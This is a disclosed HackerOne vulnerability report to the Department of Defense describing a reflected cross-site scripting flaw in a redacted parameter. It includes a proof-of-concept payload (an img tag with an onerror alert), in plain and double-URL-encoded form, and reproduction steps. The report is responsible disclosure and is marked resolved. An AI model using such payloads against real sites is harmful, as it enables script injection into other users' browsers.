Reflected XSS at ████ via ██████████= parameter

Disclosed: 2021-10-28 20:17:41 By zhenwarx To deptofdefense
Medium
Vulnerability Details
Hi I found that this endpoint is vulnerable with Reflected XSS, The ███= parameter is vulnerable with RXSS PoC: ``` ██████████?████████=%253Cimg/src/onerror=alert(document.domain)%253E ``` Payload: `<img/src/onerror=alert(document.domain)> ` Regards ## Impact RXSS ## System Host(s) www.███ ## Affected Product(s) and Version(s) ## CVE Numbers ## Steps to Reproduce ██████████?█████=%253Cimg/src/onerror=alert(document.domain)%253E ## Suggested Mitigation/Remediation Actions
Actions
View on HackerOne
Report Stats
  • Report ID: 1305472
  • State: Closed
  • Substate: resolved
  • Upvotes: 4
Share this report